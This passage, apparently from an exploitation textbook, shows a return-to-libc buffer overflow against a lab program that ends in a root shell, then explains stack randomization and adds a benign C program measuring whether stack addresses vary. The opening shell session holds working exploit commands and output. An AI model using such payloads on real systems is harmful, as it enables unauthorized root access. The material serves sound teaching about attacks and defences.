A quick binary search shows that the return address is probably overwritten by the eighth word of the program input, so seven words of dummy data are used for spacing in the exploit.
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x5')
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x10')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x8')
Segmentation fault
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7')
Illegal instruction
reader@hacking:~/booksrc $ ./vuln $(perl -e 'print "ABCD"x7 . "\x80\x0d\xed\xb7FAKE\x5b\xfe\
xff\xbf"')
sh-3.2# whoami
root
sh-3.2#
The exploit can be expanded upon by making chained libc calls, if needed. The return address of FAKE used in the example can be changed to direct program execution. Additional libc calls can be made, or execution can be directed into some other useful section in the program's existing instructions.
Randomized Stack Space
Another protective countermeasure tries a slightly different approach. Instead of preventing execution on the stack, this countermeasure randomizes the stack memory layout. When the memory layout is randomized, the attacker won't be able to return execution into waiting shellcode, since he won't know where it is.
This countermeasure has been enabled by default in the Linux kernel since 2.6.12, but the book's LiveCD has been configured with it turned off. To turn this protection on again, echo 1 to the /proc filesystem as shown below.
reader@hacking:~/booksrc $ sudo su -
root@hacking:~ # echo 1 > /proc/sys/kernel/randomize_va_space
root@hacking:~ # exit
logout
reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
reader@hacking:~/booksrc $
With this countermeasure turned on, the notesearch exploit no longer works, since the layout of the stack is randomized. Every time a program starts, the stack begins at a random location. The following example demonstrates this.
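The following program is an added example, not the book's own code, that reads the randomize_va_space setting shown above and then checks directly whether the stack actually moves between program starts by exec'ing a fresh process several times and reading the start of its [stack] mapping from /proc/self/maps. It assumes a Linux system with /proc mounted and a grep binary on the PATH.

```c
#define _POSIX_C_SOURCE 200809L  /* for popen/pclose */
#include <stdio.h>

/* Read /proc/sys/kernel/randomize_va_space (0 = off, 1 = stack, mmap and vdso
 * randomized, 2 = brk randomized too); returns -1 if the file is unreadable. */
int read_randomize_va_space(void)
{
    int value = -1;
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL) return -1;
    if (fscanf(f, "%d", &value) != 1) value = -1;
    fclose(f);
    return value;
}

/* Exec a fresh process (grep reading its own /proc/self/maps) and return the
 * start address of its [stack] mapping, or 0 if it could not be read. ASLR is
 * applied at exec time, so every call observes a newly placed stack. */
unsigned long fresh_stack_base(void)
{
    char line[512];
    unsigned long start = 0, end = 0;
    FILE *p = popen("grep '\\[stack\\]' /proc/self/maps", "r");
    if (p == NULL) return 0;
    if (fgets(line, sizeof line, p) == NULL || sscanf(line, "%lx-%lx", &start, &end) != 2)
        start = 0;
    pclose(p);
    return start;
}

/* Sample up to 64 fresh processes and count the distinct stack bases seen:
 * 1 means the stack started in the same place every time, more means it moved. */
int count_distinct_stack_bases(int runs)
{
    unsigned long seen[64];
    int distinct = 0, i, j;
    if (runs > 64) runs = 64;
    for (i = 0; i < runs; i++) {
        unsigned long base = fresh_stack_base();
        if (base == 0) continue;
        for (j = 0; j < distinct && seen[j] != base; j++) {}
        if (j == distinct) seen[distinct++] = base;
    }
    return distinct;
}

int main(void)
{
    printf("randomize_va_space = %d\n", read_randomize_va_space());
    printf("distinct stack bases over 8 runs: %d\n", count_distinct_stack_bases(8));
    return 0;
}
```

With randomize_va_space at 0 the count stays at 1 across runs; with it at 1 or 2 the count climbs toward the number of runs, which is exactly why a return address guessed from one run stops working on the next.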